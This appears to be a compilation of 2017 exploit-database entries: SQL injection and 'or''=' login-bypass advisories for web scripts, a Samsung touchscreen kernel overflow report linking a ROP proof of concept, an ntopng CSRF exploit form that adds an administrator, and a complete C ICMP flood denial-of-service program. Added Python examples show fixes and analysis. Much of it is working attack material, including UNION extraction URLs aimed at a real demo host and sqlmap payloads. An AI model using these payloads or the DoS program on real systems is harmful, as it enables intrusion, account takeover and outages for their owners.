
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Vine VideoSite Creator Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-vinezone-vine-videosite-creator-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# etc.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Job Vacancy Script
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-job-bank-job-vacancy-script/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# etc.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Home of Viral Images, Videos and Articles Script
# Script Buy Now: http://www.scriptfolder.com/viralzone-home-of-viral-images-videos-and-articles/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# etc.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: VideoZone - Video Site Creator Script 
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-videozone-video-site-creator/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# etc.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection
# Date: 19.01.2017
# Vendor Homepage: http://www.scriptfolder.com/
# Script Name: Classifieds Script 
# Script Buy Now: http://www.scriptfolder.com/scriptfolder-classifieds/
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search.php?term=[SQL]
# etc.
# # # # # 
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=967

The TSP touchscreen controller driver exposes several sysfs entries through which the driver may be configured. One such entry, "cmd", allows the user to write commands to be executed by the driver.

Specifically, the "cmd" entry is writable, and is present under:

/sys/devices/virtual/sec/tsp/cmd

Writes to this sysfs entry are handled by the function "cmd_store", under drivers/input/touchscreen/sec_ts/sec_ts_fn.c

This function does not validate the length of the supplied buffer before copying data from it into two memory locations. First, the data is copied into the "cmd" field of the driver's "ts" structure:

    ...
    memset(ts->cmd, 0x00, sizeof(ts->cmd));
    memcpy(ts->cmd, buf, length);
    memset(ts->cmd_param, 0, sizeof(ts->cmd_param));
    memset(buffer, 0x00, sizeof(buffer));
    ...

The "buf" argument contains the user-supplied data, and the "length" argument is completely user-controlled. Since ts->cmd is defined as CMD_STR_LEN (256) bytes, any write longer than that overflows into the adjacent fields of the "ts" structure, letting the attacker overwrite them with attacker-controlled data. The missing check is the obvious one: the write must be rejected (or truncated) when "length" is greater than or equal to sizeof(ts->cmd).

Second, the user-supplied data is copied into a local stack-allocated buffer, like so:

    ...
    char buffer[CMD_STR_LEN];
    ...
    pos = strchr(buf, (int)delim);
    if (pos)
        memcpy(buffer, buf, pos - buf);
    else
        memcpy(buffer, buf, length);
    ...


This means that the attacker can also overwrite data on the stack, including the saved frame pointer and return address, simply by supplying more than CMD_STR_LEN bytes before the delimiter (or no delimiter at all, in which case the full user-controlled "length" is copied). This allows the attacker to hijack control flow directly when the function returns.

I've statically and dynamically verified this issue on an SM-G935F device. The open-source kernel package I analysed was "SM-G935F_MM_Opensource", the device's build is "XXS1APG3".

The sysfs entries mentioned above are owned by UID "system" and GID "radio". The SELinux context for these entries is: "u:object_r:sysfs_sec:s0".

According to the default SELinux rules as present on the SM-G935F (version XXS1APG3), the following contexts may access these files:

   allow shell sysfs_sec : file { read open } ; 
   allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow rild sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ; 
   allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ; 
   allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ; 
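The rules above decide which processes can actually reach cmd_store: a write to the sysfs file needs at least open and write on the file class, which the shell domain does not have. The following is an added example, not part of the Project Zero report, that parses allow rules in the form listed above and answers that question. The rule text is copied from the list; the assumption that open plus write on the file class is the minimum for a sysfs write is mine, and directory search permissions and the DAC owner/group of the entry are deliberately not modelled because the page does not give the file mode.

```python
"""Added example: which SELinux domains can reach the writable "cmd" entry.

Parses allow rules in the form listed in the report and checks which source
domains hold the permissions needed to open and write a sysfs_sec file.
Directory search permissions and the DAC owner/group are not modelled.
"""
import re

# Rules exactly as listed in the report for SM-G935F build XXS1APG3.
POLICY_RULES = """
allow shell sysfs_sec : file { read open } ;
allow system_app sysfs_sec : file { ioctl read write getattr lock append open } ;
allow rild sysfs_sec : file { ioctl read write getattr lock append open } ;
allow system_app sysfs_sec : dir { ioctl read write getattr add_name remove_name search open } ;
allow diagexe sysfs_sec : file { ioctl read write getattr lock append open } ;
allow at_distributor sysfs_sec : file { ioctl read write getattr setattr lock append open } ;
"""

# allow <source> <target> : <class> { perm perm ... } ;
RULE_RE = re.compile(r"allow\s+(\w+)\s+(\w+)\s*:\s*(\w+)\s*\{([^}]*)\}\s*;")

# Assumed minimum for a write(2) to the sysfs file: open it, then write to it.
WRITE_PATH_PERMS = frozenset({"open", "write"})


def parse_allow_rules(text):
    """Return a list of (source, target, class, permissions) tuples."""
    rules = []
    for m in RULE_RE.finditer(text):
        src, tgt, cls, perms = m.groups()
        rules.append((src, tgt, cls, frozenset(perms.split())))
    return rules


def domains_with(rules, target, cls, needed):
    """Source domains whose rule on (target, class) grants every permission in needed."""
    needed = frozenset(needed)
    return sorted({src for src, tgt, c, perms in rules
                   if tgt == target and c == cls and needed <= perms})


def can_reach_cmd_store(rules, domain):
    """True if domain can open and write a sysfs_sec file, i.e. trigger cmd_store."""
    return domain in domains_with(rules, "sysfs_sec", "file", WRITE_PATH_PERMS)


if __name__ == "__main__":
    rules = parse_allow_rules(POLICY_RULES)
    print("can write sysfs_sec files:", domains_with(rules, "sysfs_sec", "file", WRITE_PATH_PERMS))
    print("adb shell can trigger cmd_store:", can_reach_cmd_store(rules, "shell"))
```

Run against the listed rules, the writers are at_distributor, diagexe, rild and system_app; the shell domain only gets read and open, so the bug is not reachable from an adb shell under this policy, and an exploit has to run from one of the four writable domains (or chain through a bug in one of them).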


Proof of concept for the buffer overflow in the TSP driver.

Includes a short ROP chain which allows execution of an arbitrary function in the context of the Linux kernel, with arbitrary arguments. The PoC also uses the KASLR bypass in "pm_qos" to adjust for the KASLR slide.

The high-level flow for executing a function in the kernel is the following:
  -Allocate a (user-space) buffer on the heap with a dummy "marker" value
  -Start a new thread (denote it "Thread B", denote the original thread "Thread A")
  -Thread A:
    -Perform a busy loop waiting for the dummy value to be updated
  -Thread B:
    -Create a ROP chain which does the following:
      -Prepares arguments for a function call
      -Calls the wanted function in the context of the kernel
      -Stores X0 in a sysfs entry in the kernel VAS (e.g., uevent_seqnum)
      -Changes the dummy value shared with thread A to indicate completion
      -Enters an idle loop
  -Thread A:
    -(Exit busy loop as the marker value has been modified)
    -Read the result of the execution by reading the sysfs entry


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41130.zip
            
# Title : Complain Management System SQL Injection
# Date: 20 January 2017
# Exploit Author: Sibusiso Sishi sibusiso@ironsky.co.za
# Tested on: Windows7 x32
# Vendor: https://sourceforge.net/projects/complain-management-system/
# Version: not supplied
# Download Software: https://sourceforge.net/projects/complain-management-system/files
 
#################################################

## About The Product : ##
Complain Management is a web-based project used to manage customer complaints online. A user can log in, create a complaint, view complaint details and track the status of their complaint.

## Vulnerability : ## 
functions.php (line 88) contains hardcoded admin credentials:
		elseif($uType == 'admin'){
			//$_SESSION['user_id'] = $row['sid'];
			if($userName == 'admin' && $password == 'admin123'){
				$_SESSION['user_id'] = 0;
				$_SESSION['user_name'] = 'Administrator';
				$_SESSION['user_type'] = 'admin';
				header('Location: '.WEB_ROOT.'index.php');
				exit;

Using the hardcoded admin credentials we then have access to process.php, whose cId parameter is vulnerable to SQL injection.

-HTTP Method : GET

- Sqlmap command: sqlmap -u "http://192.168.19.135/cms/process.php?action=deleteCust&cId=123" --cookie="PHPSESSID=q446r5fqav1qlljb7cohd29r85"

- Sqlmap Output : 
sqlmap identified the following injection point(s) with a total of 622 HTTP(s) requests:
---
Parameter: cId (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: action=deleteCust&cId=123 RLIKE (SELECT (CASE WHEN (8336=8336) THEN 123 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: action=deleteCust&cId=123 AND EXTRACTVALUE(8194,CONCAT(0x5c,0x7171706a71,(SELECT (ELT(8194=8194,1))),0x716a6b6271))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=deleteCust&cId=123 AND (SELECT * FROM (SELECT(SLEEP(5)))fdmM)
---
[22:54:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.24
back-end DBMS: MySQL >= 5.1
            
# # # # # 
# Exploit Title: ICGames-Games Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/games-site-script.htm
# Demo: http://www.icloudcenter.net/demos/icgames/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: ICDomains-Domains Marketplace Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/domains-marketplace-script.htm
# Demo: http://icloudcenter.net/demos/icdomains/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: ICTutors-Tutoring Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/tutoring-site-script.htm
# Demo: http://www.icloudcenter.net/demos/ictutors/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: IC-Mini Blog Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/mini_blog.htm
# Demo: http://www.icloudcenter.net/demos/mini_blog/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: ICJobSite-Job Site PHP Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/jobs-site-script.htm
# Demo: http://icloudcenter.net/demos/icjobsite/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?admin=login and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: ICMusic - Music Site Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/music-site-script.htm
# Demo: http://icloudcenter.net/demos/icmusic/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: ICAffiliateTracking - Affiliate Tracking Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/affiliates-tracking-script.htm
# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
# Version: 1.2
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/adminlogin.asp and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: IC-Mini CMS Script - Authentication Bypass
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software Buy: http://www.icloudcenter.com/mini_cms.htm
# Demo: http://www.icloudcenter.net/demos/mini_cms/
# Version: 1.1
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?page=login and set Username and Password to 'or''=' and hit enter.
# # # # #
            
# # # # # 
# Exploit Title: B2B Alibaba Clone Script - SQL Injection
# Google Dork: N/A
# Date: 20.01.2017
# Vendor Homepage: https://www.clonescriptsoft.com/
# Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
# Demo: http://alibaba.clonescriptsoft.com/
# Version: N/A
# Tested on: Win7 x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?IndustryID=[SQL]
# etc.
# # # # #


SQL Injection
http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()

http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
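The 'or''=' login bypass in the icloudcenter advisories, the term and cId injections in the scriptfolder and Complain Management advisories, and the UNION-based extraction shown for the B2B Alibaba clone all come from one root cause: the request parameter is concatenated into the SQL string. The following added example (my code, not any vendor's) reproduces both patterns against an in-memory SQLite database and shows the parameterised form that stops them. SQLite stands in for the targets' MySQL, so sqlite_version() and sqlite_master replace version() and information_schema.tables; the table layout and rows are invented.

```python
"""Added example: tautology login bypass and UNION extraction, vulnerable vs fixed.

SQLite stands in for MySQL: sqlite_version() replaces version() and
sqlite_master replaces information_schema.tables. Table layout is invented.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, is_admin INTEGER);
        INSERT INTO users VALUES (1, 'admin', 's3cret', 1), (2, 'alice', 'hunter2', 0);
        CREATE TABLE categories(IndustryID INTEGER, name TEXT, description TEXT);
        INSERT INTO categories VALUES (1, 'Textiles', 'Fabric suppliers');
    """)
    return conn


# --- admin login: the 'or''=' bypass ---------------------------------------

def login_vulnerable(conn, username, password):
    """String-built query. With 'or''=' in both fields the WHERE clause becomes
    username=''or''='' AND password=''or''='', which SQL parses as
    username='' OR (''='' AND password='') OR ''='', and ''='' is always true."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_fixed(conn, username, password):
    """Bound parameters: the quote characters are data, never SQL syntax."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


# --- category.php?IndustryID=... : UNION-based extraction --------------------

def category_vulnerable(conn, industry_id):
    """Numeric context, so no quote is needed: '-1 union select ...' empties the
    real result and appends attacker-chosen rows with the same column count."""
    sql = ("SELECT IndustryID, name, description FROM categories "
           "WHERE IndustryID=" + industry_id)
    return list(conn.execute(sql))


def category_fixed(conn, industry_id):
    """Validate the type first, then bind; anything that is not an integer is rejected."""
    try:
        value = int(industry_id)
    except ValueError:
        return []
    sql = "SELECT IndustryID, name, description FROM categories WHERE IndustryID=?"
    return list(conn.execute(sql, (value,)))


if __name__ == "__main__":
    conn = make_db()
    bypass = "'or''='"
    print("vulnerable login returns:", login_vulnerable(conn, bypass, bypass))
    print("fixed login returns:     ", login_fixed(conn, bypass, bypass))
    print(category_vulnerable(conn, "-1 union select 1,2,sqlite_version()"))
    print(category_vulnerable(conn, "-1 union select 1,2,group_concat(name) "
                                    "from sqlite_master where type='table'"))
    print(category_fixed(conn, "-1 union select 1,2,3"))
```

The vulnerable login returns every user row (the first of which is the administrator, which is why the bypass lands in the admin panel), while the parameterised version returns nothing. The UNION payloads are the SQLite spelling of the two URLs above; the integer cast in category_fixed is what a numeric parameter should always get before it is bound.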
            
[+]#####################################################################################
[+] Credits / Discovery: John Page AKA Hyp3rlinX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NTOPNG-CSRF-TOKEN-BYPASS.txt
[+] ISR: ApparitionSEC
[+]#####################################################################################



Vendor:
============
www.ntop.org


Product:
====================
ntopng Web Interface
v2.4.160627

ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well.


Vulnerability Type:
==================
CSRF Token Bypass



CVE Reference:
================
CVE-2017-5473



Security Issue:
=================
Simply omitting the CSRF token, or supplying an arbitrary token value, bypasses the CSRF protection on HTTP requests to the ntopng web interface. This allows remote attackers to make HTTP requests on an authenticated user's behalf if the user clicks a malicious link or visits an attacker-controlled web page. Both endpoints below also accept their state-changing request over GET, which is why a plain link or an auto-submitting GET form is enough.


Exploit/POC:
============

1) Change admin password
http://VICTIM-SERVER:3000/lua/admin/password_reset.lua?csrf=NOT-EVEN-CHECKED&username=admin&new_password=xyz123&confirm_new_password=xyz123


2) Add an arbitrary administrator user

<form action="http://VICTIM-SERVER:3000/lua/admin/add_user.lua?csrf=NOT-EVEN-CHECKED" method="GET">
<input type="hidden" name="username"  value="hyp3rlinx">
<input type="hidden" name="full_name"  value="TheApparitioN">
<input type="hidden" name="password"  value="abc123">
<input type="hidden" name="confirm_password"  value="abc123">
<input type="hidden" name="host_role"  value="administrator">
<input type="hidden" name="allowed_networks"  value="0.0.0.0/,::/">
<input type="hidden" name="allowed_interface"  value="HTTP/1.1">
<script>document.forms[0].submit()</script>
</form>
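The bug class here is a token that is carried in the request but never compared with anything. The following added example (my code, not ntopng's) models the password_reset handler twice: once as the advisory describes it, accepting any csrf value over GET, and once with the two checks that close the hole, a POST-only rule and a constant-time comparison of the supplied token against the one bound to the session. The session and user store are in-memory dicts and the field names are mine.

```python
"""Added example: password-reset handler as the bug describes it, next to a fixed one.

Sessions and the user table are in-memory dicts; field and token names are mine.
"""
import hmac
import secrets


def new_session(username):
    """A per-session CSRF token that the page must echo back in state-changing requests."""
    return {"user": username, "csrf": secrets.token_hex(16)}


def _apply_reset(users, params):
    target = params.get("username")
    if target not in users:
        return 404, "no such user"
    if params.get("new_password") != params.get("confirm_new_password"):
        return 400, "passwords differ"
    users[target] = params["new_password"]
    return 200, "password changed"


def reset_vulnerable(users, session, method, params):
    """Accepts a csrf parameter but never compares it, and acts on GET."""
    if session.get("user") != "admin":
        return 403, "not an administrator"
    return _apply_reset(users, params)


def reset_fixed(users, session, method, params):
    """Same action, but only over POST and only with the session's own token."""
    if session.get("user") != "admin":
        return 403, "not an administrator"
    if method != "POST":
        return 405, "state-changing requests must use POST"
    supplied = params.get("csrf", "")
    # compare_digest avoids leaking the token through timing; empty is never valid
    if not supplied or not hmac.compare_digest(supplied, session["csrf"]):
        return 403, "missing or invalid CSRF token"
    return _apply_reset(users, params)


if __name__ == "__main__":
    users = {"admin": "original"}
    session = new_session("admin")
    forged = {"csrf": "NOT-EVEN-CHECKED", "username": "admin",
              "new_password": "xyz123", "confirm_new_password": "xyz123"}
    print("vulnerable, GET, bogus token:", reset_vulnerable(users, session, "GET", forged))
    print("fixed, GET, bogus token:     ", reset_fixed(users, session, "GET", forged))
    print("fixed, POST, bogus token:    ", reset_fixed(users, session, "POST", forged))
    print("fixed, POST, real token:     ",
          reset_fixed(users, session, "POST", dict(forged, csrf=session["csrf"])))
```

The same check belongs on add_user.lua and every other endpoint that changes state; a token that is generated and embedded in forms but skipped on one handler protects nothing on that handler.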



Disclosure Timeline:
=====================
Vendor Notification: January 11, 2017
Vendor acknowledgement: January 12, 2017
Vendor Fixed Issue
January 20, 2017 : Public Disclosure



Network Access:
===============
Remote


Impact:
======================
Information Disclosure
Privilege Escalation



Severity:
===========
High



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.  All content (c) HYP3RLINX -
Apparition
            
/*
*  SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit
*
*  Todor Donev <todor.donev@gmail.com>
*  http://www.ethical-hacker.org/
*  https://www.facebook.com/ethicalhackerorg
*
*  Disclaimer:
*  This or previous programs is for Educational
*  purpose ONLY. Do not use it without permission.
*  The usual disclaimer applies, especially the
*  fact that Todor Donev is not liable for any
*  damages caused by direct or indirect use of the
*  information or functionality provided by these
*  programs. The author or any Internet provider
*  bears NO responsibility for content or misuse
*  of these programs or any derivatives thereof.
*  By using these programs you accept the fact
*  that any damage (dataloss, system crash,
*  system compromise, etc.) caused by the use
*  of these programs is not Todor Donev's
*  responsibility.
*
*  Use them at your own risk!
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

/* Raw IPv4 datagram sent as-is: a 20-byte IP header (TOS 0xFF, TTL 126,
 * protocol 1 = ICMP, total-length field 0x004D = 77 although only 75 bytes
 * are sent) followed by an ICMP type 3 / code 1 (host unreachable) message
 * whose quoted inner datagram is garbage. Bytes 16..19 hold the destination
 * address and are patched at run time by resolve(). */
unsigned char b00m[75] =
{
    0x45, 0xFF, 0x00, 0x4D, 0x0C,
    0x52, 0x00, 0x00, 0x7E, 0x01,
    0x0C, 0xF2, 0x85, 0x47, 0x21,
    0x07, 0xC0, 0xA8, 0x0E, 0x58,
    0x03, 0x01, 0xAE, 0x37, 0x6F,
    0x3B, 0x66, 0xA7, 0x60, 0xAA,
    0x76, 0xC1, 0xEC, 0xA7, 0x7D,
    0xFA, 0x8A, 0x72, 0x8E, 0xC6,
    0xE3, 0xD2, 0x64, 0x13, 0xE7,
    0x4D, 0xBC, 0x01, 0x40, 0x5B,
    0x8E, 0x8B, 0xE5, 0xEE, 0x5E,
    0x37, 0xDD, 0xC2, 0x54, 0x8E,
    0x8D, 0xCE, 0x0C, 0x42, 0x97,
    0xA1, 0x8C, 0x04, 0x8A, 0xC2,
    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
} ;

/* Resolve the target and patch its IPv4 address into b00m. The original used
 * sizeof(long) here, which copies 8 bytes on LP64 and clobbers the ICMP
 * type/code/checksum that follow the destination address. */
in_addr_t resolve(char *target)
{
    struct hostent *tgt;
    in_addr_t addr;

    tgt = gethostbyname(target);
    if (tgt == NULL)
        return INADDR_NONE;
    memcpy(&addr, tgt->h_addr, sizeof(addr));
    memcpy(b00m + 16, &addr, sizeof(addr));   /* IP header: destination address */
    return addr;
}

int main(int argc, char *argv[])
{
    struct sockaddr_in dst;
    in_addr_t daddr;
    int s0cket;

    printf("[ SunOS 5.11 Remote ICMP Weakness Kernel DoS Exploit\n");
    printf("[ Todor Donev <todor.donev@gmail.com> www.ethical-hacker.org\n");
    if (argc < 2) {
        printf("[ Usage: %s <target>\n", *argv);
        return 1;
    }
    daddr = resolve(argv[1]);
    if (daddr == INADDR_NONE) {
        fprintf(stderr, "[ Cannot resolve %s\n", argv[1]);
        return 1;
    }
    memset(&dst, 0, sizeof(dst));
    dst.sin_family      = AF_INET;
    dst.sin_addr.s_addr = daddr;

    /* IPPROTO_RAW implies IP_HDRINCL: the header inside b00m goes out
     * unchanged apart from what the local stack fills in. Requires root. */
    s0cket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s0cket == -1) {
        perror("[ socket");
        return 1;
    }
    printf("[ ICMP Attacking: %s\n", argv[1]);
    /* Flood: resend the same datagram until interrupted or sendto() fails. */
    while (1) {
        if (sendto(s0cket, b00m, sizeof(b00m), 0,
                   (struct sockaddr *)&dst, sizeof(struct sockaddr_in)) == -1) {
            perror("[ Error");
            exit(-1);
        }
    }
}
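To see what the loop above actually puts on the wire, the following added example (my code, not the exploit author's) decodes the hard-coded b00m datagram with a plain IPv4/ICMP header parser and verifies its checksums. The byte array is copied from the exploit with its placeholder destination 192.168.14.88 still in place; nothing is sent.

```python
"""Added example: decode the hard-coded b00m datagram and check its headers."""
import socket
import struct

# Copied from the exploit above; bytes 16..19 are the placeholder destination
# 192.168.14.88 that resolve() overwrites at run time.
B00M = bytes([
    0x45, 0xFF, 0x00, 0x4D, 0x0C, 0x52, 0x00, 0x00, 0x7E, 0x01,
    0x0C, 0xF2, 0x85, 0x47, 0x21, 0x07, 0xC0, 0xA8, 0x0E, 0x58,
    0x03, 0x01, 0xAE, 0x37, 0x6F, 0x3B, 0x66, 0xA7, 0x60, 0xAA,
    0x76, 0xC1, 0xEC, 0xA7, 0x7D, 0xFA, 0x8A, 0x72, 0x8E, 0xC6,
    0xE3, 0xD2, 0x64, 0x13, 0xE7, 0x4D, 0xBC, 0x01, 0x40, 0x5B,
    0x8E, 0x8B, 0xE5, 0xEE, 0x5E, 0x37, 0xDD, 0xC2, 0x54, 0x8E,
    0x8D, 0xCE, 0x0C, 0x42, 0x97, 0xA1, 0x8C, 0x04, 0x8A, 0xC2,
    0x6B, 0xAE, 0xE9, 0x2E, 0xFE,
])


def inet_checksum(data):
    """RFC 1071 ones'-complement sum; a buffer whose checksum field is correct sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(pkt):
    """Return the IPv4 and ICMP header fields plus consistency checks."""
    (ver_ihl, tos, total_len, ident, frag, ttl, proto,
     hcksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    hdr = pkt[:ihl]
    info = {
        "version": ver_ihl >> 4, "ihl": ihl, "tos": tos,
        "total_length": total_len, "bytes_on_wire": len(pkt),
        "identification": ident, "flags_fragment": frag,
        "ttl": ttl, "protocol": proto,
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "ip_checksum_field": hcksum,
        "ip_checksum_valid": inet_checksum(hdr) == 0,
        # what the field would have to be for this header as it stands
        "ip_checksum_expected": inet_checksum(hdr[:10] + b"\x00\x00" + hdr[12:]),
    }
    icmp = pkt[ihl:]
    itype, icode, icksum = struct.unpack("!BBH", icmp[:4])
    info.update({"icmp_type": itype, "icmp_code": icode, "icmp_checksum_field": icksum,
                 "icmp_checksum_valid": inet_checksum(icmp) == 0, "icmp_length": len(icmp)})
    if itype == 3 and len(icmp) > 8:
        # Destination Unreachable quotes the offending datagram after 4 unused bytes;
        # the first quoted byte carries that datagram's version and IHL nibbles.
        info["inner_version"] = icmp[8] >> 4
        info["inner_ihl"] = icmp[8] & 0x0F
    return info


if __name__ == "__main__":
    for key, value in parse_packet(B00M).items():
        print("%-22s %s" % (key, hex(value) if key.endswith("_field") else value))
```

Decoded, the datagram is internally inconsistent in three places: the total-length field says 77 bytes while 75 are sent, the header checksum 0x0CF2 does not verify (0xBA10 would be correct for these addresses as they stand), and the datagram quoted inside the ICMP error starts with byte 0x60, a version nibble of 6 with an IHL of 0, so it is not a parseable IPv4 header. One caveat when replaying this from Linux: raw(7) states that with IP_HDRINCL the kernel always fills in the total length and the header checksum, so those two malformations are repaired before transmission on a Linux sender and only the bogus quoted datagram survives.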
            
